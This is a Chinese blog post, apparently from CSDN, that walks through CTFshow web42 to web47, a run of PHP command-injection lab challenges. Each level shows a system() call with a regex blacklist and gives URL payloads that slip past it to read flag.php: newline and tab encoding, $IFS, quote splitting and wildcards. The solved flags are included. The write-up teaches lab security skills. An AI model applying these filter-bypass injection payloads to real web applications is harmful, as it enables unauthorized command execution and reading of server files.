CTFshow web42 43 44 45 46 47

最新推荐文章于 2023-09-06 18:45:05 发布
最新推荐文章于 2023-09-06 18:45:05 发布
阅读量757 收藏 1
点赞数 1
分类专栏: 命令执行 CTF 渗透测试 文章标签: web安全 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40345591/article/details/127775404
版权
渗透测试 同时被 3 个专栏收录
49 篇文章 4 订阅
订阅专栏
CTF
16 篇文章 0 订阅
订阅专栏
命令执行
10 篇文章 2 订阅
订阅专栏

web42

代码分析:

if(isset($_GET['c'])){
    $c=$_GET['c'];
    system($c." >/dev/null 2>&1");

>/dev/null 2>&1;这里是重定向

直接截断即可

截断方法 ; , && , %0a,||等等,有很多截断方法

payload:

?c=ls;

?c=ls%0a

?c=tac flag.php;

flag:

 ctfshow{51f460e3-9382-4c18-bdcf-a95fc3421833}

web43 

代码分析:

 if(!preg_match("/\;|cat/i", $c)){
        system($c." >/dev/null 2>&1");
    }

过滤了分号,直接用%0a就可

payload:

/?c=tac flag.php%0a

flag:

ctfshow{2d27f06d-bd87-4e70-ae21-31e67575b980}

web44

代码分析:

if(!preg_match("/;|cat|flag/i", $c)){
        system($c." >/dev/null 2>&1");
    }

多过滤了一个flag,无伤大雅,直接引号绕过或者通配符绕过

payload:

/?c=tac fl*%0a

/?c=tac fl""ag.php%0a

 flag:

ctfshow{2ddcefb8-0b23-4ec0-8426-b85d36191bd4}

web45 

代码分析:

 if(!preg_match("/\;|cat|flag| /i", $c)){
        system($c." >/dev/null 2>&1");
    }

多过滤了一个空格,无伤大雅,$IFS$1绕过 %09绕过都行

payload:

/?c=tac%09fl*%0a

/?c=tac$IFS$1fl""ag.php%0a

flag:

ctfshow{4723d047-0424-4d94-965d-4eaf37775991}

web46

代码分析:

if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c)){
        system($c." >/dev/null 2>&1");
    }

多过滤了数字和$ * $IFS$1 和通配符用不了了

知识点:%09 %0a 不算数字是url编码,我一开始也是懵逼的

payload:

/?c=tac%09fl""ag.php%0a

 

flag:

ctfshow{f6210dde-d15e-43d8-9dfa-b5e133afc3c8} 

web47 

代码分析:

 if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail/i", $c)){
        system($c." >/dev/null 2>&1");
    }

过滤了几个前面没用过的函数,看来还有很多其他的解法哇,恰好咱的解法可以一直用

payload:

/?c=tac%09fl""ag.php%0a

 

flag:

ctfshow{13c4c6b0-2118-44bb-9c85-fabde174b2bd}

白帽Chen_D
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Base47:Kotlin编写的Base47编码器解码器,使用表情符号作为其字符集
02-05
Base47:Kotlin编写的Base47编码器解码器,使用表情符号作为其字符集
ctfshow web入门命令执行44-48
m0_62207170的博客
03-29 332
ctfshow web入门命令执行44-48
Ctfshow web入门-web42
qq_45427131的博客
05-18 1164
web42 检查代码,发现代码似乎很简单?只需要输入命令执行,但是实际执行之后的小伙伴会发现如果只是输一个指令,回显都是空白,原因很简单。 在给变量c赋值的语句下面的语句”>/dev/null 2>&1“ ,可以将其理解成将输入的数写入黑洞 2>/dev/null 意思就是把错误输出到“黑洞” >/dev/null 2>&1 默认情况是1,也就是等同于1>/dev/null 2>&1。意思就是把标准输出重定向到“黑洞”,还把错误输出2
CTFShow文件包含(web78-88)
lonmar的博客
11-28 3020
web78 php://input + POSTdata命令执行 ?file=php://filter/convert.base64-encode/resource=flag.php web79 大小写绕过str_replace str_replace() 函数替换字符串中的一些字符(区分大小写)。 2. data:// ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= web80 大小写
CTFshow web入门 web41~web55 命令执行
qq_56815564的博客
04-15 1386
这回是真正意义上的禁用了这些命令了,以前还能通过中间添加一些特殊符号来绕过的,现在是完全不能使用了,毕竟 . 后面跟上一个通配符后,就完全不能在中间加点什么了。简单分析一下,if中的语句第一个是输出GET传入的参数、第二个是执行c的语句后得到的东西赋值给d、第三个是换行后在输出d的内容。但是留下了一个一个或运算符( | )空格不能用可以使用tab键代替,url编码是%09,反正tab是最多是4个空格,多几个空格也不会怎样。说到底,这么多能有回显的函数,也不差cat这一个,形式有这么多,也不差分号这一个。
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
某RSA
YUK_103的博客
03-02 860
题目如下所示: from Crypto.Util.number import getPrime,bytes_to_long from sympy import Derivative from fractions import Fraction from secret import flag p=getPrime(1024) q=getPrime(1024) e=65537 n=p*q z=Fra...
CTFshow 菜狗杯 部分wp
weixin_44770698的博客
02-04 2120
ctfshow 菜狗杯 web部分练习(暂时不全)
ctfshow-Web入门-42~52wp(命令执行)
yutianovo的博客
09-06 1485
Web42 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-05 20:51:55 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $c=$_GET['
Ctfshow web入门-web46
qq_45427131的博客
05-18 386
web46 查看源码,preg_match的过滤又增加了空格和$ 本来我们对于空格的绕过是${IFS}和%0a,不过preg_match过滤了美元符,用%09也可以绕过preg_match的过滤, 虽然对获取到的值有preg_match的过滤,但是preg_match不能过滤这种没有空格的命令,譬如ls,dir,whoami等等,首先执行,查看当前目录底下有哪些文件 构造payload: ?c=ls&&ls (&记得编码) 成功rce,接下来就是·获取flag,因为源码过滤
ctfshow web入门 命令执行39-43
m0_62207170的博客
03-31 386
ctfshow web入门 命令执行39-43
ctfshow web入门---文件执行 解题思路
qq_73767109的博客
04-20 819
ctfshow web入门(web29-web59)解题思路与方法
CTFshow 命令执行 web46
Kradress的博客
11-19 252
目录源码知识点题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-05 21:50:19 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){
Ctfshow web入门-web43 WP
qq_45427131的博客
05-18 431
web43 查看原码: preg_match 过滤了cat指令,cat指令可以用nl tac等等代替 然后system()函数就是常规的命令执行,将输入的变量写入黑洞,这种情况老套路直接双写就可以了 关于双写:怕还是有小伙伴不懂,看不懂的小伙伴请看下表 2>/dev/null 意思就是把错误输出到“黑洞” >/dev/null 2>&1 默认情况是1,也就是等同于1>/dev/null 2>&1。意思就是把标准输出重定向到“黑洞”,还把错误输出
ctfshow web42-46
最新发布
m0_69289738的博客
09-06 90
tac flag.php有空格,在ASCLL表中找一个不可显示的字符替代。空格的url编码是%20水平制表符的url编码是%09,我们用%09代替。源代码中的 >/dev/null 2>&1会让输入的c都输入到黑洞里。%09不算数字,在执行后会自动编码为水平制表符。直接改成tac flag.php得到flag。这题在上一题的基础上多过滤了一个flag。在上一题的基础上多过滤了;我们使用&符号分割,要对&进行编码。在上一题的基础上多过滤了数字,!选中&&对它进行编码就行。比上一题多过滤了空格。
ctfshow web 42
08-21
- *1* *2* *3* [CTFshow web42 43 44 45 46 47](https://blog.csdn.net/qq_40345591/article/details/127775404)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白帽Chen_D

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值